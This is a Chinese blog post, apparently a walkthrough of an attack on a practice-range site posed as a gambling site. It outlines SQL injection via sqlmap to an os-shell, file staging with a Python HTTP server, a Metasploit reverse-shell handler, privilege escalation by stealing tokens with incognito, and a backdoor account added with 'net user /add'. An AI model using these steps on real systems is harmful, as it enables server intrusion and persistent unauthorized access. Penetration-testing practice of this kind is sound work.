2个月前 (09-09)  网站建设 |   抢沙发  8 
文章评分 6 次,平均分 5.0

近些日子,有不少朋友看了博主之前的讲网站安全的文章,询问博主如何模拟攻击自己的网站来测试网站是否安全。今儿博主带大家一起来尝试模拟攻击非法网站。带大家实战演练一下。(该网站为靶场练习网站,并非真正的赌博网站,请大家不要激动,本博客旨在模拟技术演练,不做真实的攻击,也请大家千万不要攻击别人的网站)

其实博主也在这段时间一直在捣鼓sql注入和msf联合getshell,拿到网站服务器。下面是方法步骤:

一、收集信息

因为主要想练习sql注入,所以信息收集做的比较简单:

通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功

通过fofa找到相关cms

如何模拟攻击非法网站?非法网站容易被攻击吗?

发现后台登录页面有post sql注入

二、利用sqlmap一把梭并获取os-shell

如何模拟攻击非法网站?非法网站容易被攻击吗?

三、利用python搭建一个简单的http服务器

python -m SimpleHTTPServer

如何模拟攻击非法网站?非法网站容易被攻击吗?

四、在这里要给他的服务器写入一个目录

md C:\test

用自己的服务器上文件上传到被攻击服务器上

如何模拟攻击非法网站?非法网站容易被攻击吗?

如何模拟攻击非法网站?非法网站容易被攻击吗?

如何模拟攻击非法网站?非法网站容易被攻击吗?

五、然后我们在msf上操作

1. :输入 use exploit/mulit/hander

1. : 输入 set lhost 接收反弹shell的ip

1. :输入 run

如何模拟攻击非法网站?非法网站容易被攻击吗?

六、成功进入该服务器

这时发现我们只有gust权限,还不够

七、开启提权之路

内核提权

窃取管理tokens 提权(本文只利用tokens 提权方式)

使用use incognito来加载会话令牌模块

然后list_tokens -u来列出会话令牌

如何模拟攻击非法网站?非法网站容易被攻击吗?

提权成功啦!

八、创建用户

命令:net user 用户名 密码 /add

如何模拟攻击非法网站?非法网站容易被攻击吗?

忘了把自己加入管理员用户组了

如何模拟攻击非法网站?非法网站容易被攻击吗?

大功告成!

我们在模拟攻击的时候其实是跟程序员在斗智斗勇,并不是你觉得不会有这么简单的漏洞网站就没有漏洞,而是要在攻击的时候多尝试,不要放过任何一个可以攻击的点。这样你才能成为一个合格的网络安全工程师。

还是那句话,大家有什么问题可以留言讨论。

 

除特别注明外,本站所有文章均为叶荣添原创,转载请注明出处来自https://www.wzxiaolou.com/459.html

关于

发表评论

表情 格式

暂无评论

切换注册

登录

忘记密码 ?

切换登录

注册

您是第 6547 位访客, 您的IP是:[100.24.125.162]